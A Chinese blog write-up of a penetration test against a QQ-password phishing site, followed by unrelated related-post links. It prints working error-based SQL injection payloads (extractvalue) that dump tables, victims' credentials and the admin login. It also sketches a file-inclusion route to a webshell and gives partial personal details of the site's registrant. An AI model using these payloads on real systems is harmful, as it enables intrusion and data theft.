一、信息收集

在一个风和日丽的下午,突然在我们专业群里面有位同学发来一个二维码要收集信息,说需要微信扫描后填写信息

像这种二维码,这种介绍,一眼就看出它不是好东西。闲的没事干的我,就准备爆入它,刚好给我这小白练练手。果不其然。这种假页面,就是不法分子用来收集信息的,而且除了能输入外,底下的忘记密码和注册新账号根本点不动。啊,太假了。不知道害了多少人。

这里我直接用了一个信息收集网站,输入域名后自动收集,用nmap扫了扫。信息收集网站:TideFinger 潮汐指纹 TideFinger 潮汐指纹

操作系统:Linux(操作系统也可以直接将域名中随便一个字母改变大小写看网站反应,linux大小写敏感会报错,windows不敏感)

中间件:nginx

后端语言:php

ip:45.xxx.xxx.xxx(美国)

开放端口:21/tcp open ftp

80/tcp open http

888/tcp open accessbuilder

域名注册人邮箱:26618xxxxx@qq.com(搜了一下是贵州的,今年19岁)

目录扫描:2.rar(我下载下来是源码泄露了,先不管这个,黑盒测试一波)

二、漏洞发现

看见这输入框我就想注入,先不管其他的,试试再说。浏览器开启的代理,准备用burp拦截,但是burp还没有反应,浏览器这边提示必须输入数字。由此判断是前端限制。

这里可以直接浏览器f12删除type="number"绕过前端限制。接下来burp拦截。

网站直接报错,反应头还提示为什么错,直接暴露表和字段,可能debug没关。

直接报错注入,用extractvalue()

(1)条件1:secure_file_priv无限制

(2)条件2:目录权限可读

(3)限制:extractvalue()函数最多读取32个字符

payload:'and(select extractvalue(1,concat(0x7e,(select database()))))直接拼接在u后面,数据库是w01

访问url/2.rar下载压缩包,解压发现是网站源码

发现w1是网站后台需要账户密码

三、漏洞利用

接下来就好办多了

数据库版本是5.6.50(information_schema保存了MySQL服务器所有数据库的信息。 如数据库名,数据库的表(mysql 5.0以上有),5.0以下只能通过爆破猜表名字段)

查数据库名:u='and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名:u='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆字段名:u='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

爆数据:u='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

因为之前回应头注释已经暴露了表名和字段,也可以直接查。这就是他们收集的QQ号密码了(因为extractvalue()函数最多读取32个字符可以使用limit在后面限制输出,第一个数字代表从第几行数据输出,第二个数字代表输出几行数据)

payload:u='and(select extractvalue(3,concat(0x7e,(select user_name from cc_users limit 0,1 ))))#

爆相应的密码

payload:u='and(select extractvalue(3,concat(0x7e,(select user_psw from cc_users limit 0,1 ))))#

当然,通过源码泄露我直接收集了所有表名

回到我们的源码,后台登录的地方,直接代码审计,发现后台账户密码在cc_admins这张表里面

报错注入把所有字段都爆出来

payload:u='and(select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name="cc_admins" limit 0,1))))#(改变0到7,爆出8个字段)

报错注入把对应字段的数据爆出来

payload:u='and(select extractvalue(1,concat(0x7e,(select f_userName from cc_admins limit 0,1))))#(改变字段值)

f_id, f_userPwd(e19d5cd5af0378da05f63f891c7467a), f_userName(admin),f_groupid(1), f_status(1), f_tag(100),f_psw(abcd1234),f_reg_time(1533386669)

用sqlmap跑不动,我也不知道为啥,只能手动注入了

账号:admin 密码:abcd1234。成功进入后台,后台记录着受骗者的QQ和密码还有其他重要信息。

这里报错得到了网站绝对路径,但是mysql不是root权限,没办法插入一句话木马得到webshell

通过审计代码发现有一个备份王,在网上搜索相关漏洞没找出来

但是发现在/config/sbak/phomebak.php这个文件中发现$mypath可控,跟进代码

这个Ebak_BakExe函数没有对mypath做任何过滤处理就包含了,想到了%00截断后面路径,这样上传带木马的图片就可以利用这个文件包含漏洞,但是前提是先能找到这个备份王的账号密码,没有办法直接跳过登录,访问这个页面。

就在我正要进行下一步的时候,他跑路了.................

后台有一个可以上传文件的地方,但是我没有看出来有什么漏洞。

四、总结

入一半突然没了。先是通过信息收集,网站源码泄露下载到源码,发现网站后台路径。然后通过网站收集qq密码的页面发现了报错注入,由此得到了后台账号和密码,进入后台。通过源码审计发现”备份王“的文件包含漏洞,接下来准备再通过注入得到”备份王“的账号和密码,然后就可以利用这个漏洞,再在后台尝试文件上传漏洞,如果可以。两个洞配合拿到websell。可惜啊!他跑路了。无了。

我也不知道他收集qq和密码有什么目的,现在登录qq都需要手机端验证,有可能撞库其他什么平台密码。

【漏洞挖掘】QQ钓鱼网站实战渗透相关推荐

  1. LOL钓鱼网站实战渗透

    点击上方蓝字关注我们 相信很多人都有遇到过这样的经历,无意中点到一些钓鱼网站,然后就泄露了自身信息,造成了一定的损失,对于这样的网站各位需警惕,千万不要乱点击来历不明的网站. 今天我就来说说钓鱼网站的 ...

  2. 当python小白遇到QQ钓鱼网站

    当python小白遇到QQ钓鱼网站 今天又是和平(无聊)的一天,突然我的qq邮箱接受到一个信息,我向往常一样想着----这又是一个垃圾信息.但当我打开看到内容时,嗯 0.o ~~.没错,它吸引了我. ...

  3. Mituan-极客时间-漏洞挖掘与智能攻防实战

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.CVE-2009-4194 二.CVE-2021-42013 二.CVE-2021-31760 三.RSA - 低加密 ...

  4. 攻防比赛中系统层漏洞挖掘-身份隐藏解决方案

    系统层漏洞挖掘 系统层漏洞的挖掘需要很多相对高级的漏洞挖掘方法.从实战角 度看,以下6种挖掘方法最为实用:代码跟踪.动态调试.Fuzzing技 术.补丁对比.软件逆向静态分析.系统安全机制分析. 1) ...

  5. 对某钓鱼网站的一次渗透测试

    周末在某个CTF群偶然看到这个钓鱼网站:http://gggggg.cn(声明:本文中出现的域名.IP均被替换,并非真实存在,请勿测试),于是开始对该网站进行渗透.观察网站页面,可知这个网站应该是用来 ...

  6. 企业网站制作网站安全评估技术与漏洞挖掘技术

    近些年在信息技术的作用下, 人们的生活方式.生活质量发生了翻天覆地的变化, 而这一切都得益于对网络技术的应用与使用.当然与之对应的是在网络技术的不断应用过程中, 网络安全问题渐渐成为了人们必须重视的问 ...

  7. web安全渗透之钓鱼网站提权

    本实验实现1:要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接 ...

  8. 实战敏感信息泄露高危漏洞挖掘利用

    信息泄露介绍: 信息泄露就是某网站某公司对敏感数据没有安全的保护,导致泄露敏感被攻击者利用,例如泄露:账号,密码,管理员,身份证,数据库,服务器,敏感路径等等 信息泄露危害: 如果进了业务系统可以SQ ...

  9. shodan 渗透测试 漏洞挖掘 一些用法

    渗透测试中,第一阶段就是信息搜集,这一阶段完成的如何决定了你之后的进行是否顺利,是否更容易.而关于信息收集的文章网上也是有太多.今天我们来通过一些例子来讲解如何正确使用Shodan这一利器. 想要利用 ...

最新文章

  1. ipv6改为ipv4
  2. python数据库应用开发实例_纯Python开发的nosql数据库CodernityDB介绍和使用实例
  3. matlab--曲线拟合
  4. mysql的存储过程基本使用
  5. 成都python数据分析师职业技能_想成为数据分析师,需要重点学习什么技能?
  6. jquery.tablesorter
  7. CSS 奇技淫巧:动态高度过渡动画
  8. java修改cookie的值_Java管理Cookie增删改查操作。
  9. 如何判断 DataRow 中是否存在某列????
  10. 《Windows黑客编程技术》—— 学习历程
  11. 工欲善其事必先利其器
  12. linux yield_带你通俗易懂的了解——Linux线程模型和线程切换
  13. matlab中m_map工具箱绘制大圆航线
  14. 怎么用python画一个皮卡丘,用python画皮卡丘的代码
  15. word快捷键被占用
  16. 红帽linux内核修复,红帽Linux 7和CentOS 7的新Linux内核更新修复两个错误
  17. 台积电第一季度净利润198.5亿元 同比增长35.3%
  18. 解决NoteExpress无法在Word中插入引用文献
  19. Rasa使用指南01
  20. Eclipse CDT+Qemu调试Linux 0.11内核

热门文章

  1. 《黄花黄》曈曈诗作品摘录
  2. VA78L05V6DYE 24V转5V电源 限流电阻参数设计
  3. judgement_mna_2016
  4. 测量设备校准/验证后,如何判定是否符合有关规范?
  5. 最新百亿量化私募名单
  6. 千万数据去重_基于 Flink 的百亿数据去重实践
  7. 孩子越出息,父母越孤独
  8. MySQL函数Locate的使用
  9. 一首古诗带来的图数据库大冒险
  10. mongodb数据文件格式